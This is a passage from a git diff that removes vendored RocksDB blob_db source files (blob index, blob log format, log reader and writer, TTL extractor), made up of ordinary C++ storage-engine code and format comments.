-  bool NeedsFsync(bool hard, uint64_t bytes_per_sync) const;
-
-  void Fsync();
-
-  uint64_t GetFileSize() const {
-    return file_size_.load(std::memory_order_acquire);
-  }
-
-  // All Get functions which are not atomic, will need ReadLock on the mutex
-
-  ExpirationRange GetExpirationRange() const { return expiration_range_; }
-
-  void ExtendExpirationRange(uint64_t expiration) {
-    expiration_range_.first = std::min(expiration_range_.first, expiration);
-    expiration_range_.second = std::max(expiration_range_.second, expiration);
-  }
-
-  SequenceRange GetSequenceRange() const { return sequence_range_; }
-
-  void SetSequenceRange(SequenceRange sequence_range) {
-    sequence_range_ = sequence_range;
-  }
-
-  void ExtendSequenceRange(SequenceNumber sequence) {
-    sequence_range_.first = std::min(sequence_range_.first, sequence);
-    sequence_range_.second = std::max(sequence_range_.second, sequence);
-  }
-
-  bool HasTTL() const { return has_ttl_; }
-
-  void SetHasTTL(bool has_ttl) { has_ttl_ = has_ttl; }
-
-  CompressionType compression() const { return compression_; }
-
-  void SetCompression(CompressionType c) {
-    compression_ = c;
-  }
-
-  std::shared_ptr<Writer> GetWriter() const { return log_writer_; }
-
- private:
-  std::shared_ptr<Reader> OpenSequentialReader(
-      Env* env, const DBOptions& db_options,
-      const EnvOptions& env_options) const;
-
-  Status ReadFooter(BlobLogFooter* footer);
-
-  Status WriteFooterAndCloseLocked();
-
-  std::shared_ptr<RandomAccessFileReader> GetOrOpenRandomAccessReader(
-      Env* env, const EnvOptions& env_options, bool* fresh_open);
-
-  void CloseRandomAccessLocked();
-
-  // this is used, when you are reading only the footer of a
-  // previously closed file
-  Status SetFromFooterLocked(const BlobLogFooter& footer);
-
-  void set_expiration_range(const ExpirationRange& expiration_range) {
-    expiration_range_ = expiration_range;
-  }
-
-  // The following functions are atomic, and don't need locks
-  void SetFileSize(uint64_t fs) { file_size_ = fs; }
-
-  void SetBlobCount(uint64_t bc) { blob_count_ = bc; }
-};
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_index.h b/thirdparty/rocksdb/utilities/blob_db/blob_index.h
deleted file mode 100644
index fd91b54..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_index.h
+++ /dev/null
@@ -1,161 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/options.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-// BlobIndex is a pointer to the blob and metadata of the blob. The index is
-// stored in base DB as ValueType::kTypeBlobIndex.
-// There are three types of blob index:
-//
-//    kInlinedTTL:
-//      +------+------------+---------------+
-//      | type | expiration | value         |
-//      +------+------------+---------------+
-//      | char | varint64   | variable size |
-//      +------+------------+---------------+
-//
-//    kBlob:
-//      +------+-------------+----------+----------+-------------+
-//      | type | file number | offset   | size     | compression |
-//      +------+-------------+----------+----------+-------------+
-//      | char | varint64    | varint64 | varint64 | char        |
-//      +------+-------------+----------+----------+-------------+
-//
-//    kBlobTTL:
-//      +------+------------+-------------+----------+----------+-------------+
-//      | type | expiration | file number | offset   | size     | compression |
-//      +------+------------+-------------+----------+----------+-------------+
-//      | char | varint64   | varint64    | varint64 | varint64 | char        |
-//      +------+------------+-------------+----------+----------+-------------+
-//
-// There isn't a kInlined (without TTL) type since we can store it as a plain
-// value (i.e. ValueType::kTypeValue).
-class BlobIndex {
- public:
-  enum class Type : unsigned char {
-    kInlinedTTL = 0,
-    kBlob = 1,
-    kBlobTTL = 2,
-    kUnknown = 3,
-  };
-
-  BlobIndex() : type_(Type::kUnknown) {}
-
-  bool IsInlined() const { return type_ == Type::kInlinedTTL; }
-
-  bool HasTTL() const {
-    return type_ == Type::kInlinedTTL || type_ == Type::kBlobTTL;
-  }
-
-  uint64_t expiration() const {
-    assert(HasTTL());
-    return expiration_;
-  }
-
-  const Slice& value() const {
-    assert(IsInlined());
-    return value_;
-  }
-
-  uint64_t file_number() const {
-    assert(!IsInlined());
-    return file_number_;
-  }
-
-  uint64_t offset() const {
-    assert(!IsInlined());
-    return offset_;
-  }
-
-  uint64_t size() const {
-    assert(!IsInlined());
-    return size_;
-  }
-
-  Status DecodeFrom(Slice slice) {
-    static const std::string kErrorMessage = "Error while decoding blob index";
-    assert(slice.size() > 0);
-    type_ = static_cast<Type>(*slice.data());
-    if (type_ >= Type::kUnknown) {
-      return Status::Corruption(
-          kErrorMessage,
-          "Unknown blob index type: " + ToString(static_cast<char>(type_)));
-    }
-    slice = Slice(slice.data() + 1, slice.size() - 1);
-    if (HasTTL()) {
-      if (!GetVarint64(&slice, &expiration_)) {
-        return Status::Corruption(kErrorMessage, "Corrupted expiration");
-      }
-    }
-    if (IsInlined()) {
-      value_ = slice;
-    } else {
-      if (GetVarint64(&slice, &file_number_) && GetVarint64(&slice, &offset_) &&
-          GetVarint64(&slice, &size_) && slice.size() == 1) {
-        compression_ = static_cast<CompressionType>(*slice.data());
-      } else {
-        return Status::Corruption(kErrorMessage, "Corrupted blob offset");
-      }
-    }
-    return Status::OK();
-  }
-
-  static void EncodeInlinedTTL(std::string* dst, uint64_t expiration,
-                               const Slice& value) {
-    assert(dst != nullptr);
-    dst->clear();
-    dst->reserve(1 + kMaxVarint64Length + value.size());
-    dst->push_back(static_cast<char>(Type::kInlinedTTL));
-    PutVarint64(dst, expiration);
-    dst->append(value.data(), value.size());
-  }
-
-  static void EncodeBlob(std::string* dst, uint64_t file_number,
-                         uint64_t offset, uint64_t size,
-                         CompressionType compression) {
-    assert(dst != nullptr);
-    dst->clear();
-    dst->reserve(kMaxVarint64Length * 3 + 2);
-    dst->push_back(static_cast<char>(Type::kBlob));
-    PutVarint64(dst, file_number);
-    PutVarint64(dst, offset);
-    PutVarint64(dst, size);
-    dst->push_back(static_cast<char>(compression));
-  }
-
-  static void EncodeBlobTTL(std::string* dst, uint64_t expiration,
-                            uint64_t file_number, uint64_t offset,
-                            uint64_t size, CompressionType compression) {
-    assert(dst != nullptr);
-    dst->clear();
-    dst->reserve(kMaxVarint64Length * 4 + 2);
-    dst->push_back(static_cast<char>(Type::kBlobTTL));
-    PutVarint64(dst, expiration);
-    PutVarint64(dst, file_number);
-    PutVarint64(dst, offset);
-    PutVarint64(dst, size);
-    dst->push_back(static_cast<char>(compression));
-  }
-
- private:
-  Type type_ = Type::kUnknown;
-  uint64_t expiration_ = 0;
-  Slice value_;
-  uint64_t file_number_ = 0;
-  uint64_t offset_ = 0;
-  uint64_t size_ = 0;
-  CompressionType compression_ = kNoCompression;
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_log_format.cc b/thirdparty/rocksdb/utilities/blob_db/blob_log_format.cc
deleted file mode 100644
index eb748ac..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_log_format.cc
+++ /dev/null
@@ -1,153 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "utilities/blob_db/blob_log_format.h"
-
-#include "util/coding.h"
-#include "util/crc32c.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-void BlobLogHeader::EncodeTo(std::string* dst) {
-  assert(dst != nullptr);
-  dst->clear();
-  dst->reserve(BlobLogHeader::kSize);
-  PutFixed32(dst, kMagicNumber);
-  PutFixed32(dst, version);
-  PutFixed32(dst, column_family_id);
-  unsigned char flags = (has_ttl ? 1 : 0);
-  dst->push_back(flags);
-  dst->push_back(compression);
-  PutFixed64(dst, expiration_range.first);
-  PutFixed64(dst, expiration_range.second);
-}
-
-Status BlobLogHeader::DecodeFrom(Slice src) {
-  static const std::string kErrorMessage =
-      "Error while decoding blob log header";
-  if (src.size() != BlobLogHeader::kSize) {
-    return Status::Corruption(kErrorMessage,
-                              "Unexpected blob file header size");
-  }
-  uint32_t magic_number;
-  unsigned char flags;
-  if (!GetFixed32(&src, &magic_number) || !GetFixed32(&src, &version) ||
-      !GetFixed32(&src, &column_family_id)) {
-    return Status::Corruption(
-        kErrorMessage,
-        "Error decoding magic number, version and column family id");
-  }
-  if (magic_number != kMagicNumber) {
-    return Status::Corruption(kErrorMessage, "Magic number mismatch");
-  }
-  if (version != kVersion1) {
-    return Status::Corruption(kErrorMessage, "Unknown header version");
-  }
-  flags = src.data()[0];
-  compression = static_cast<CompressionType>(src.data()[1]);
-  has_ttl = (flags & 1) == 1;
-  src.remove_prefix(2);
-  if (!GetFixed64(&src, &expiration_range.first) ||
-      !GetFixed64(&src, &expiration_range.second)) {
-    return Status::Corruption(kErrorMessage, "Error decoding expiration range");
-  }
-  return Status::OK();
-}
-
-void BlobLogFooter::EncodeTo(std::string* dst) {
-  assert(dst != nullptr);
-  dst->clear();
-  dst->reserve(BlobLogFooter::kSize);
-  PutFixed32(dst, kMagicNumber);
-  PutFixed64(dst, blob_count);
-  PutFixed64(dst, expiration_range.first);
-  PutFixed64(dst, expiration_range.second);
-  PutFixed64(dst, sequence_range.first);
-  PutFixed64(dst, sequence_range.second);
-  crc = crc32c::Value(dst->c_str(), dst->size());
-  crc = crc32c::Mask(crc);
-  PutFixed32(dst, crc);
-}
-
-Status BlobLogFooter::DecodeFrom(Slice src) {
-  static const std::string kErrorMessage =
-      "Error while decoding blob log footer";
-  if (src.size() != BlobLogFooter::kSize) {
-    return Status::Corruption(kErrorMessage,
-                              "Unexpected blob file footer size");
-  }
-  uint32_t src_crc = 0;
-  src_crc = crc32c::Value(src.data(), BlobLogFooter::kSize - 4);
-  src_crc = crc32c::Mask(src_crc);
-  uint32_t magic_number;
-  if (!GetFixed32(&src, &magic_number) || !GetFixed64(&src, &blob_count) ||
-      !GetFixed64(&src, &expiration_range.first) ||
-      !GetFixed64(&src, &expiration_range.second) ||
-      !GetFixed64(&src, &sequence_range.first) ||
-      !GetFixed64(&src, &sequence_range.second) || !GetFixed32(&src, &crc)) {
-    return Status::Corruption(kErrorMessage, "Error decoding content");
-  }
-  if (magic_number != kMagicNumber) {
-    return Status::Corruption(kErrorMessage, "Magic number mismatch");
-  }
-  if (src_crc != crc) {
-    return Status::Corruption(kErrorMessage, "CRC mismatch");
-  }
-  return Status::OK();
-}
-
-void BlobLogRecord::EncodeHeaderTo(std::string* dst) {
-  assert(dst != nullptr);
-  dst->clear();
-  dst->reserve(BlobLogRecord::kHeaderSize + key.size() + value.size());
-  PutFixed64(dst, key.size());
-  PutFixed64(dst, value.size());
-  PutFixed64(dst, expiration);
-  header_crc = crc32c::Value(dst->c_str(), dst->size());
-  header_crc = crc32c::Mask(header_crc);
-  PutFixed32(dst, header_crc);
-  blob_crc = crc32c::Value(key.data(), key.size());
-  blob_crc = crc32c::Extend(blob_crc, value.data(), value.size());
-  blob_crc = crc32c::Mask(blob_crc);
-  PutFixed32(dst, blob_crc);
-}
-
-Status BlobLogRecord::DecodeHeaderFrom(Slice src) {
-  static const std::string kErrorMessage = "Error while decoding blob record";
-  if (src.size() != BlobLogRecord::kHeaderSize) {
-    return Status::Corruption(kErrorMessage,
-                              "Unexpected blob record header size");
-  }
-  uint32_t src_crc = 0;
-  src_crc = crc32c::Value(src.data(), BlobLogRecord::kHeaderSize - 8);
-  src_crc = crc32c::Mask(src_crc);
-  if (!GetFixed64(&src, &key_size) || !GetFixed64(&src, &value_size) ||
-      !GetFixed64(&src, &expiration) || !GetFixed32(&src, &header_crc) ||
-      !GetFixed32(&src, &blob_crc)) {
-    return Status::Corruption(kErrorMessage, "Error decoding content");
-  }
-  if (src_crc != header_crc) {
-    return Status::Corruption(kErrorMessage, "Header CRC mismatch");
-  }
-  return Status::OK();
-}
-
-Status BlobLogRecord::CheckBlobCRC() const {
-  uint32_t expected_crc = 0;
-  expected_crc = crc32c::Value(key.data(), key.size());
-  expected_crc = crc32c::Extend(expected_crc, value.data(), value.size());
-  expected_crc = crc32c::Mask(expected_crc);
-  if (expected_crc != blob_crc) {
-    return Status::Corruption("Blob CRC mismatch");
-  }
-  return Status::OK();
-}
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_log_format.h b/thirdparty/rocksdb/utilities/blob_db/blob_log_format.h
deleted file mode 100644
index 0b5cff5..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_log_format.h
+++ /dev/null
@@ -1,123 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Log format information shared by reader and writer.
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <limits>
-#include <utility>
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-constexpr uint32_t kMagicNumber = 2395959;  // 0x00248f37
-constexpr uint32_t kVersion1 = 1;
-constexpr uint64_t kNoExpiration = std::numeric_limits<uint64_t>::max();
-
-using ExpirationRange = std::pair<uint64_t, uint64_t>;
-using SequenceRange = std::pair<uint64_t, uint64_t>;
-
-// Format of blob log file header (30 bytes):
-//
-//    +--------------+---------+---------+-------+-------------+-------------------+
-//    | magic number | version |  cf id  | flags | compression | expiration range  |
-//    +--------------+---------+---------+-------+-------------+-------------------+
-//    |   Fixed32    | Fixed32 | Fixed32 | char  |    char     | Fixed64   Fixed64 |
-//    +--------------+---------+---------+-------+-------------+-------------------+
-//
-// List of flags:
-//   has_ttl: Whether the file contain TTL data.
-//
-// Expiration range in the header is a rough range based on
-// blob_db_options.ttl_range_secs.
-struct BlobLogHeader {
-  static constexpr size_t kSize = 30;
-
-  uint32_t version = kVersion1;
-  uint32_t column_family_id = 0;
-  CompressionType compression = kNoCompression;
-  bool has_ttl = false;
-  ExpirationRange expiration_range = std::make_pair(0, 0);
-
-  void EncodeTo(std::string* dst);
-
-  Status DecodeFrom(Slice slice);
-};
-
-// Format of blob log file footer (48 bytes):
-//
-//    +--------------+------------+-------------------+-------------------+------------+
-//    | magic number | blob count | expiration range  |  sequence range   | footer CRC |
-//    +--------------+------------+-------------------+-------------------+------------+
-//    |   Fixed32    |  Fixed64   | Fixed64 + Fixed64 | Fixed64 + Fixed64 |   Fixed32  |
-//    +--------------+------------+-------------------+-------------------+------------+
-//
-// The footer will be presented only when the blob file is properly closed.
-//
-// Unlike the same field in file header, expiration range in the footer is the
-// range of smallest and largest expiration of the data in this file.
-struct BlobLogFooter {
-  static constexpr size_t kSize = 48;
-
-  uint64_t blob_count = 0;
-  ExpirationRange expiration_range = std::make_pair(0, 0);
-  SequenceRange sequence_range = std::make_pair(0, 0);
-  uint32_t crc = 0;
-
-  void EncodeTo(std::string* dst);
-
-  Status DecodeFrom(Slice slice);
-};
-
-// Blob record format (32 bytes header + key + value):
-//
-//    +------------+--------------+------------+------------+----------+---------+-----------+
-//    | key length | value length | expiration | header CRC | blob CRC |   key   |   value   |
-//    +------------+--------------+------------+------------+----------+---------+-----------+
-//    |   Fixed64  |   Fixed64    |  Fixed64   |  Fixed32   | Fixed32  | key len | value len |
-//    +------------+--------------+------------+------------+----------+---------+-----------+
-//
-// If file has has_ttl = false, expiration field is always 0, and the blob
-// doesn't has expiration.
-//
-// Also note that if compression is used, value is compressed value and value
-// length is compressed value length.
-//
-// Header CRC is the checksum of (key_len + val_len + expiration), while
-// blob CRC is the checksum of (key + value).
-//
-// We could use variable length encoding (Varint64) to save more space, but it
-// make reader more complicated.
-struct BlobLogRecord {
-  // header include fields up to blob CRC
-  static constexpr size_t kHeaderSize = 32;
-
-  uint64_t key_size = 0;
-  uint64_t value_size = 0;
-  uint64_t expiration = 0;
-  uint32_t header_crc = 0;
-  uint32_t blob_crc = 0;
-  Slice key;
-  Slice value;
-  std::string key_buf;
-  std::string value_buf;
-
-  void EncodeHeaderTo(std::string* dst);
-
-  Status DecodeHeaderFrom(Slice src);
-
-  Status CheckBlobCRC() const;
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_log_reader.cc b/thirdparty/rocksdb/utilities/blob_db/blob_log_reader.cc
deleted file mode 100644
index a2421b9..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_log_reader.cc
+++ /dev/null
@@ -1,96 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "utilities/blob_db/blob_log_reader.h"
-
-#include <algorithm>
-
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-Reader::Reader(std::shared_ptr<Logger> info_log,
-               unique_ptr<SequentialFileReader>&& _file)
-    : info_log_(info_log), file_(std::move(_file)), buffer_(), next_byte_(0) {}
-
-Status Reader::ReadSlice(uint64_t size, Slice* slice, std::string* buf) {
-  buf->reserve(size);
-  Status s = file_->Read(size, slice, &(*buf)[0]);
-  next_byte_ += size;
-  if (!s.ok()) {
-    return s;
-  }
-  if (slice->size() != size) {
-    return Status::Corruption("EOF reached while reading record");
-  }
-  return s;
-}
-
-Status Reader::ReadHeader(BlobLogHeader* header) {
-  assert(file_.get() != nullptr);
-  assert(next_byte_ == 0);
-  Status s = ReadSlice(BlobLogHeader::kSize, &buffer_, &backing_store_);
-  if (!s.ok()) {
-    return s;
-  }
-
-  if (buffer_.size() != BlobLogHeader::kSize) {
-    return Status::Corruption("EOF reached before file header");
-  }
-
-  return header->DecodeFrom(buffer_);
-}
-
-Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level,
-                          uint64_t* blob_offset) {
-  Status s = ReadSlice(BlobLogRecord::kHeaderSize, &buffer_, &backing_store_);
-  if (!s.ok()) {
-    return s;
-  }
-  if (buffer_.size() != BlobLogRecord::kHeaderSize) {
-    return Status::Corruption("EOF reached before record header");
-  }
-
-  s = record->DecodeHeaderFrom(buffer_);
-  if (!s.ok()) {
-    return s;
-  }
-
-  uint64_t kb_size = record->key_size + record->value_size;
-  if (blob_offset != nullptr) {
-    *blob_offset = next_byte_ + record->key_size;
-  }
-
-  switch (level) {
-    case kReadHeader:
-      file_->Skip(record->key_size + record->value_size);
-      next_byte_ += kb_size;
-      break;
-
-    case kReadHeaderKey:
-      s = ReadSlice(record->key_size, &record->key, &record->key_buf);
-      file_->Skip(record->value_size);
-      next_byte_ += record->value_size;
-      break;
-
-    case kReadHeaderKeyBlob:
-      s = ReadSlice(record->key_size, &record->key, &record->key_buf);
-      if (s.ok()) {
-        s = ReadSlice(record->value_size, &record->value, &record->value_buf);
-      }
-      if (s.ok()) {
-        s = record->CheckBlobCRC();
-      }
-      break;
-  }
-  return s;
-}
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_log_reader.h b/thirdparty/rocksdb/utilities/blob_db/blob_log_reader.h
deleted file mode 100644
index 9c76b92..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_log_reader.h
+++ /dev/null
@@ -1,92 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <memory>
-#include <string>
-
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "utilities/blob_db/blob_log_format.h"
-
-namespace rocksdb {
-
-class SequentialFileReader;
-class Logger;
-
-namespace blob_db {
-
-/**
- * Reader is a general purpose log stream reader implementation. The actual job
- * of reading from the device is implemented by the SequentialFile interface.
- *
- * Please see Writer for details on the file and record layout.
- */
-class Reader {
- public:
-  enum ReadLevel {
-    kReadHeader,
-    kReadHeaderKey,
-    kReadHeaderKeyBlob,
-  };
-
-  // Create a reader that will return log records from "*file".
-  // "*file" must remain live while this Reader is in use.
-  //
-  // If "reporter" is non-nullptr, it is notified whenever some data is
-  // dropped due to a detected corruption.  "*reporter" must remain
-  // live while this Reader is in use.
-  //
-  // If "checksum" is true, verify checksums if available.
-  //
-  // The Reader will start reading at the first record located at physical
-  // position >= initial_offset within the file.
-  Reader(std::shared_ptr<Logger> info_log,
-         std::unique_ptr<SequentialFileReader>&& file);
-
-  ~Reader() = default;
-
-  // No copying allowed
-  Reader(const Reader&) = delete;
-  Reader& operator=(const Reader&) = delete;
-
-  Status ReadHeader(BlobLogHeader* header);
-
-  // Read the next record into *record.  Returns true if read
-  // successfully, false if we hit end of the input.  May use
-  // "*scratch" as temporary storage.  The contents filled in *record
-  // will only be valid until the next mutating operation on this
-  // reader or the next mutation to *scratch.
-  // If blob_offset is non-null, return offset of the blob through it.
-  Status ReadRecord(BlobLogRecord* record, ReadLevel level = kReadHeader,
-                    uint64_t* blob_offset = nullptr);
-
-  Status ReadSlice(uint64_t size, Slice* slice, std::string* buf);
-
-  SequentialFileReader* file() { return file_.get(); }
-
-  void ResetNextByte() { next_byte_ = 0; }
-
-  uint64_t GetNextByte() const { return next_byte_; }
-
-  const SequentialFileReader* file_reader() const { return file_.get(); }
-
- private:
-  std::shared_ptr<Logger> info_log_;
-  const std::unique_ptr<SequentialFileReader> file_;
-
-  std::string backing_store_;
-  Slice buffer_;
-
-  // which byte to read next. For asserting proper usage
-  uint64_t next_byte_;
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_log_writer.cc b/thirdparty/rocksdb/utilities/blob_db/blob_log_writer.cc
deleted file mode 100644
index 806ca3c..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_log_writer.cc
+++ /dev/null
@@ -1,121 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#include "utilities/blob_db/blob_log_writer.h"
-
-#include <cstdint>
-#include <string>
-#include "rocksdb/env.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-#include "utilities/blob_db/blob_log_format.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-Writer::Writer(unique_ptr<WritableFileWriter>&& dest, uint64_t log_number,
-               uint64_t bpsync, bool use_fs, uint64_t boffset)
-    : dest_(std::move(dest)),
-      log_number_(log_number),
-      block_offset_(boffset),
-      bytes_per_sync_(bpsync),
-      next_sync_offset_(0),
-      use_fsync_(use_fs),
-      last_elem_type_(kEtNone) {}
-
-void Writer::Sync() { dest_->Sync(use_fsync_); }
-
-Status Writer::WriteHeader(BlobLogHeader& header) {
-  assert(block_offset_ == 0);
-  assert(last_elem_type_ == kEtNone);
-  std::string str;
-  header.EncodeTo(&str);
-
-  Status s = dest_->Append(Slice(str));
-  if (s.ok()) {
-    block_offset_ += str.size();
-    s = dest_->Flush();
-  }
-  last_elem_type_ = kEtFileHdr;
-  return s;
-}
-
-Status Writer::AppendFooter(BlobLogFooter& footer) {
-  assert(block_offset_ != 0);
-  assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord);
-
-  std::string str;
-  footer.EncodeTo(&str);
-
-  Status s = dest_->Append(Slice(str));
-  if (s.ok()) {
-    block_offset_ += str.size();
-    s = dest_->Close();
-    dest_.reset();
-  }
-
-  last_elem_type_ = kEtFileFooter;
-  return s;
-}
-
-Status Writer::AddRecord(const Slice& key, const Slice& val,
-                         uint64_t expiration, uint64_t* key_offset,
-                         uint64_t* blob_offset) {
-  assert(block_offset_ != 0);
-  assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord);
-
-  std::string buf;
-  ConstructBlobHeader(&buf, key, val, expiration);
-
-  Status s = EmitPhysicalRecord(buf, key, val, key_offset, blob_offset);
-  return s;
-}
-
-Status Writer::AddRecord(const Slice& key, const Slice& val,
-                         uint64_t* key_offset, uint64_t* blob_offset) {
-  assert(block_offset_ != 0);
-  assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord);
-
-  std::string buf;
-  ConstructBlobHeader(&buf, key, val, 0);
-
-  Status s = EmitPhysicalRecord(buf, key, val, key_offset, blob_offset);
-  return s;
-}
-
-void Writer::ConstructBlobHeader(std::string* buf, const Slice& key,
-                                 const Slice& val, uint64_t expiration) {
-  BlobLogRecord record;
-  record.key = key;
-  record.value = val;
-  record.expiration = expiration;
-  record.EncodeHeaderTo(buf);
-}
-
-Status Writer::EmitPhysicalRecord(const std::string& headerbuf,
-                                  const Slice& key, const Slice& val,
-                                  uint64_t* key_offset, uint64_t* blob_offset) {
-  Status s = dest_->Append(Slice(headerbuf));
-  if (s.ok()) {
-    s = dest_->Append(key);
-  }
-  if (s.ok()) {
-    s = dest_->Append(val);
-  }
-  if (s.ok()) {
-    s = dest_->Flush();
-  }
-
-  *key_offset = block_offset_ + BlobLogRecord::kHeaderSize;
-  *blob_offset = *key_offset + key.size();
-  block_offset_ = *blob_offset + val.size();
-  last_elem_type_ = kEtRecord;
-  return s;
-}
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_log_writer.h b/thirdparty/rocksdb/utilities/blob_db/blob_log_writer.h
deleted file mode 100644
index 2a1f05e..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_log_writer.h
+++ /dev/null
@@ -1,91 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <cstdint>
-#include <memory>
-#include <string>
-
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-#include "utilities/blob_db/blob_log_format.h"
-
-namespace rocksdb {
-
-class WritableFileWriter;
-
-namespace blob_db {
-
-/**
- * Writer is the blob log stream writer. It provides an append-only
- * abstraction for writing blob data.
- *
- *
- * Look at blob_db_format.h to see the details of the record formats.
- */
-
-class Writer {
- public:
-  // Create a writer that will append data to "*dest".
-  // "*dest" must be initially empty.
-  // "*dest" must remain live while this Writer is in use.
-  explicit Writer(std::unique_ptr<WritableFileWriter>&& dest,
-                  uint64_t log_number, uint64_t bpsync, bool use_fsync,
-                  uint64_t boffset = 0);
-
-  ~Writer() = default;
-
-  // No copying allowed
-  Writer(const Writer&) = delete;
-  Writer& operator=(const Writer&) = delete;
-
-  static void ConstructBlobHeader(std::string* buf, const Slice& key,
-                                  const Slice& val, uint64_t expiration);
-
-  Status AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset,
-                   uint64_t* blob_offset);
-
-  Status AddRecord(const Slice& key, const Slice& val, uint64_t expiration,
-                   uint64_t* key_offset, uint64_t* blob_offset);
-
-  Status EmitPhysicalRecord(const std::string& headerbuf, const Slice& key,
-                            const Slice& val, uint64_t* key_offset,
-                            uint64_t* blob_offset);
-
-  Status AppendFooter(BlobLogFooter& footer);
-
-  Status WriteHeader(BlobLogHeader& header);
-
-  WritableFileWriter* file() { return dest_.get(); }
-
-  const WritableFileWriter* file() const { return dest_.get(); }
-
-  uint64_t get_log_number() const { return log_number_; }
-
-  bool ShouldSync() const { return block_offset_ > next_sync_offset_; }
-
-  void Sync();
-
-  void ResetSyncPointer() { next_sync_offset_ += bytes_per_sync_; }
-
- private:
-  std::unique_ptr<WritableFileWriter> dest_;
-  uint64_t log_number_;
-  uint64_t block_offset_;  // Current offset in block
-  uint64_t bytes_per_sync_;
-  uint64_t next_sync_offset_;
-  bool use_fsync_;
-
- public:
-  enum ElemType { kEtNone, kEtFileHdr, kEtRecord, kEtFileFooter };
-  ElemType last_elem_type_;
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/ttl_extractor.cc b/thirdparty/rocksdb/utilities/blob_db/ttl_extractor.cc
deleted file mode 100644
index 267f904..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/ttl_extractor.cc
+++ /dev/null
@@ -1,34 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#include "utilities/blob_db/blob_db.h"
-#include "util/coding.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-bool TTLExtractor::ExtractTTL(const Slice& /*key*/, const Slice& /*value*/,
-                              uint64_t* /*ttl*/, std::string* /*new_value*/,
-                              bool* /*value_changed*/) {
-  return false;
-}
-
-bool TTLExtractor::ExtractExpiration(const Slice& key, const Slice& value,
-                                     uint64_t now, uint64_t* expiration,
-                                     std::string* new_value,
-                                     bool* value_changed) {
-  uint64_t ttl;
